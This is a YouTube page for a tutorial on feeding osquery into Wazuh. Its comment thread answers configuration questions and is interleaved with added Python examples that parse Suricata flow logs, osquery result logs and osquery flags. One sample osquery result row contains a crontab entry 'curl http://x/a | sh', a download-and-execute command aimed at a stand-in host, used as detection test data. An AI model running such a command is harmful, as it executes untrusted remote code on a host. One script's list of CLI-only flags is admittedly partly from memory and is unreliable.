Automate OSQUERY with Wazuh - Let's Build A Host Intrusion Detection System

  • Published on Dec 21, 2024

Comments •

  • @iain_grant
    @iain_grant 1 year ago

    Great vid - helps me understand where to place osquery as Wazuh isn't that clear on that.

  • @kennethshibaba4490
    @kennethshibaba4490 1 year ago +1

    Hi Taylor. Great video. Did you install osquery in your server or agent device? Forgive the question.

  • @LiamPaul-p3n
    @LiamPaul-p3n 9 months ago

    What could be causing nothing in Wazuh to show up in the dashboard like yours does? I followed the video and can't seem to get any events in Wazuh.

  • @jasonyeung2498
    @jasonyeung2498 3 years ago +1

    Might I ask if I can put the osquery.conf into /var/ossec/etc/shared/ so that, for example in Windows, I can pull the conf file back at C:\Program Files (x86)\ossec-agent\shared\osquery.conf? Is it one way to do the remote deployment for osquery?

    • @taylorwalton1388
      @taylorwalton1388 3 years ago

      Hey Jason, unfortunately no. The /var/ossec/etc/shared directory contains parameters that also belong in the ossec.conf. This allows you to set up log collection, FIM directories, wodle modules, etc. and apply these settings to all Wazuh agents in the group. To mass deploy the osquery.conf you could use Ansible, Chef or another remote deployment tool of your choice. Hope that helps and thanks for watching!

  • @pierreyoboue5473
    @pierreyoboue5473 1 year ago

    Hi, thanks for all of this. I have a request: can I have your config and flag files? I want to deploy on Windows and I have some problems with these files.

  • @tomsgrinbergs8020
    @tomsgrinbergs8020 3 years ago

    A little bit off topic here..
    Wondering if there is a network flow (not Cisco's NetFlow) tool that can be installed in a home lab setting and then integrated into Wazuh?

    • @taylorwalton_socfortress
      @taylorwalton_socfortress 3 years ago

      Hey Tom,
      Are you interested in monitoring network traffic, with something like an IDS/IPS device? If so, I really enjoy an open source tool called Suricata. It can be set inline or receive packets via a SPAN port. These results detail network flows as well as any network related events such as traffic to a command and control server, web application attacks, IP reputation and more. This tool integrates very well with Wazuh and ELK.
      I plan on covering Suricata and integrating it with Wazuh in future videos, but feel free to explore on your own! suricata.readthedocs.io/en/latest/what-is-suricata.html
      Thanks for watching!

    • @tomsgrinbergs8020
      @tomsgrinbergs8020 3 years ago

      @@taylorwalton_socfortress
      Thanks, yes I've been looking into Suricata. I'm struggling with aggregating the bytes sent and received, so essentially the sum of the below:
      data.flow.bytes_toclient
      data.flow.bytes_toserver
      It appears that these are strings and thus don't show under "Significant Terms" when "Sum" is selected within visualizations, so I'm not able to see the total of bytes sent and received between 2 IP addresses. I'm now wondering how to use Jupyter Notebook to do this, but I think that's a big stretch.
      Anyhow, will wait for your video on Suricata in future, thanks for making this content - I really enjoy it!
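The aggregation Tom describes above, done offline over exported Suricata EVE flow events, as an added example (not code from the video or from any commenter). It assumes the flow records carry `src_ip`, `dest_ip`, `flow.bytes_toserver` and `flow.bytes_toclient` as Suricata writes them to eve.json; the byte counters are deliberately given as strings, which is how they appear when a dashboard Sum refuses them, and are cast back to integers before summing. Both directions of a conversation are folded into one unordered IP pair. The sample events are constructed.

```python
"""Sum Suricata flow bytes per IP pair from eve.json-style lines.

Added example, not from the video or the comment thread. The sample
events are constructed to resemble Suricata EVE "flow" records; the byte
counters are strings on purpose, since string-typed fields are what keeps
a numeric Sum aggregation from working on them in the dashboard.
"""
import json
from collections import defaultdict

# Constructed sample: three flow events for one conversation (both
# directions), one non-flow event and one malformed line.
SAMPLE_EVE_LINES = [
    json.dumps({"event_type": "flow", "src_ip": "10.0.0.5", "dest_ip": "10.0.0.9",
                "flow": {"bytes_toserver": "1200", "bytes_toclient": "340"}}),
    json.dumps({"event_type": "flow", "src_ip": "10.0.0.9", "dest_ip": "10.0.0.5",
                "flow": {"bytes_toserver": "50", "bytes_toclient": "8000"}}),
    json.dumps({"event_type": "flow", "src_ip": "10.0.0.5", "dest_ip": "10.0.0.9",
                "flow": {"bytes_toserver": "100", "bytes_toclient": "0"}}),
    json.dumps({"event_type": "alert", "src_ip": "10.0.0.5", "dest_ip": "10.0.0.9"}),
    "not json at all",
]


def _to_int(value):
    # Counters may arrive as int or str depending on the pipeline; a missing
    # or unparsable counter contributes nothing rather than aborting the run.
    try:
        return int(value)
    except (TypeError, ValueError):
        return 0


def pair_key(ip_a, ip_b):
    # Unordered pair so client->server and server->client flows share a bucket.
    return tuple(sorted((ip_a, ip_b)))


def sum_flow_bytes(lines):
    """Return {(ip_a, ip_b): {"toserver": n, "toclient": n, "total": n}}."""
    totals = defaultdict(lambda: {"toserver": 0, "toclient": 0, "total": 0})
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines instead of failing the whole file
        if event.get("event_type") != "flow":
            continue
        flow = event.get("flow", {})
        to_server = _to_int(flow.get("bytes_toserver"))
        to_client = _to_int(flow.get("bytes_toclient"))
        bucket = totals[pair_key(event.get("src_ip"), event.get("dest_ip"))]
        bucket["toserver"] += to_server
        bucket["toclient"] += to_client
        bucket["total"] += to_server + to_client
    return dict(totals)


if __name__ == "__main__":
    for pair, counts in sum_flow_bytes(SAMPLE_EVE_LINES).items():
        print(pair, counts)
```

Point the same function at the lines of a real eve.json (or at the `data.flow.*` fields of exported Wazuh alerts) and the per-pair totals come out without depending on the index mapping; making the dashboard itself sum the field would instead require the counters to be indexed as numbers, which the thread does not cover.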

  • @anhuc2824
    @anhuc2824 3 years ago

    Hi, I have a Fleet server to manage all osquery agents, and the osquery_result file of all servers is located on the Fleet server. How do I add the osquery_result log to Wazuh? Thanks

    • @taylorwalton_socfortress
      @taylorwalton_socfortress 3 years ago +2

      If the osquery_result is being output as JSON, install a Wazuh agent onto the Fleet server and edit the ossec.conf file to contain this block:

        <localfile>
          <location>/path/to/osquery_result</location>
          <log_format>json</log_format>
        </localfile>

      Hope that helps and thanks for watching!

    • @pierreyoboue5473
      @pierreyoboue5473 1 year ago

      @@taylorwalton_socfortress but how do you know the format?
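The format question in the reply above, answered with an added example (not code from the video, from Wazuh or from osquery). osqueryd's filesystem logger writes one JSON object per line, which is the shape Wazuh's `<log_format>json</log_format>` reader consumes. With the default `--logger_event_type=true` every line is one row carrying `columns` and an `action` of `added` or `removed`; with `--logger_event_type=false` a line holds one query run with a `diffResults` object; snapshot queries carry a `snapshot` list. The parser below normalises all three into rows and reports lines Wazuh's reader would reject, going beyond the single shape the comment mentions. The sample lines are constructed.

```python
"""Normalise osqueryd results-log lines and flag ones Wazuh cannot ingest.

Added example, not from the video, Wazuh or osquery. Handles the three
result shapes osqueryd writes: per-row "event" lines (default), per-run
"diffResults" lines (--logger_event_type=false) and "snapshot" lines.
The sample lines are constructed.
"""
import json

SAMPLE_RESULT_LINES = [
    # Event format (default): one row per line with an "action".
    json.dumps({"name": "listening_ports", "hostIdentifier": "web01",
                "unixTime": 1700000000, "action": "added",
                "columns": {"pid": "4242", "port": "4444", "address": "0.0.0.0"}}),
    json.dumps({"name": "listening_ports", "hostIdentifier": "web01",
                "unixTime": 1700000060, "action": "removed",
                "columns": {"pid": "4242", "port": "4444", "address": "0.0.0.0"}}),
    # Batch format (--logger_event_type=false): one line per query run.
    json.dumps({"name": "crontab", "hostIdentifier": "web01",
                "unixTime": 1700000120,
                "diffResults": {"added": [{"command": "curl http://x/a | sh",
                                           "path": "/etc/crontab"}],
                                "removed": []}}),
    # Snapshot query: the whole result set on every run.
    json.dumps({"name": "os_version", "hostIdentifier": "web01",
                "unixTime": 1700000180, "action": "snapshot",
                "snapshot": [{"name": "Ubuntu", "version": "22.04"}]}),
    # Not valid JSON: Wazuh's json log reader would drop this line.
    "{ not valid json",
]


class ResultLogError(ValueError):
    """Raised for a line that is not one well-formed osquery result object."""


def parse_result_line(line):
    """Return a list of (query_name, host, action, columns) for one line."""
    try:
        obj = json.loads(line)
    except json.JSONDecodeError as exc:
        raise ResultLogError(f"not a JSON object: {exc}") from exc
    if not isinstance(obj, dict):
        raise ResultLogError("line must be a single JSON object")
    name = obj.get("name", "")
    host = obj.get("hostIdentifier", "")
    rows = []
    if "diffResults" in obj:                    # batch format
        for action in ("added", "removed"):
            for cols in obj["diffResults"].get(action, []):
                rows.append((name, host, action, cols))
    elif obj.get("action") == "snapshot":       # snapshot query
        for cols in obj.get("snapshot", []):
            rows.append((name, host, "snapshot", cols))
    elif "columns" in obj:                      # event format
        rows.append((name, host, obj.get("action", ""), obj["columns"]))
    else:
        raise ResultLogError("unrecognised osquery result shape")
    return rows


def parse_result_log(lines):
    """Parse every line; return (rows, errors) so one bad line hides nothing."""
    rows, errors = [], []
    for lineno, line in enumerate(lines, 1):
        try:
            rows.extend(parse_result_line(line))
        except ResultLogError as exc:
            errors.append((lineno, str(exc)))
    return rows, errors


def rows_by_action(rows):
    """Count rows per action: a quick sanity check that diffs are flowing."""
    counts = {}
    for _, _, action, _ in rows:
        counts[action] = counts.get(action, 0) + 1
    return counts


if __name__ == "__main__":
    parsed, bad = parse_result_log(SAMPLE_RESULT_LINES)
    for row in parsed:
        print(row)
    for lineno, msg in bad:
        print(f"line {lineno} rejected: {msg}")
```

Running it over a real osqueryd.results.log (or Fleet's forwarded copy) tells you both which shape the file is in and whether any line would be silently dropped by the `json` log reader.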

  • @8eck
    @8eck 1 year ago

    Automated installation of osquery would be more interesting...

  • @JayapradhaP-u2j
    @JayapradhaP-u2j 1 year ago

    W0706 18:03:09.135244 2388 options.cpp:106] The CLI only flag --logger_plugin set via config file will be ignored, please use a flagfile or pass it to the process at startup
    I'm facing this log on my custom query, but packs work fine.
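The warning quoted in the comment above comes from osquery's startup option parsing: some flags are CLI-only and are dropped with that message when they appear under `"options"` in osquery.conf instead of in a flagfile or on the command line. The helper below, an added example that is not code from the video or from osquery, splits a set of options into the lines that belong in osquery.flags and the ones that may stay in the config. `logger_plugin` is CLI-only by the warning's own wording; the other names in `CLI_ONLY` are from memory of osquery's CLI_FLAG definitions and should be confirmed against `osqueryd --help` on your build (assumption). The sample options are constructed.

```python
"""Split osquery options into flagfile lines and config-file options.

Added example, not from the video or from osquery. CLI_ONLY lists flags
osquery reads only from the command line or a flagfile; logger_plugin is
confirmed by the warning text in the thread, the others are from memory
of osquery's CLI_FLAG definitions and should be checked with
`osqueryd --help` (assumption).
"""
CLI_ONLY = {
    "config_plugin", "config_path", "logger_plugin", "database_path",
    "extensions_autoload", "extensions_socket", "pidfile", "daemonize",
}

# Constructed sample: an "options" block as someone might write it in
# osquery.conf before seeing the warning.
SAMPLE_OPTIONS = {
    "logger_plugin": "filesystem",        # CLI-only: ignored if left here
    "config_plugin": "filesystem",        # CLI-only
    "logger_path": "/var/log/osquery",    # runtime flag: fine in the config
    "schedule_splay_percent": "10",
    "disable_events": "false",
}


def split_options(options, cli_only=CLI_ONLY):
    """Return (flagfile_lines, config_options).

    flagfile_lines are ready to be written to osquery.flags one per line;
    config_options is what should remain under "options" in osquery.conf.
    """
    flag_lines, config_opts = [], {}
    for name, value in sorted(options.items()):
        if name in cli_only:
            flag_lines.append(f"--{name}={value}")
        else:
            config_opts[name] = value
    return flag_lines, config_opts


def render_flagfile(flag_lines):
    """Flagfile text: one --name=value per line, trailing newline."""
    return "\n".join(flag_lines) + "\n"


def misplaced_cli_flags(options, cli_only=CLI_ONLY):
    """Names that will trigger the 'CLI only flag ... will be ignored' warning."""
    return sorted(name for name in options if name in cli_only)


if __name__ == "__main__":
    flags, config = split_options(SAMPLE_OPTIONS)
    print("ignored if left in osquery.conf:", misplaced_cli_flags(SAMPLE_OPTIONS))
    print("osquery.flags:")
    print(render_flagfile(flags), end="")
    print("osquery.conf options:", config)
```

On Windows the flagfile is what the osqueryd service reads at startup, so the same split applies there: the flagfile carries the plugin and path flags, and the config carries the schedule and packs.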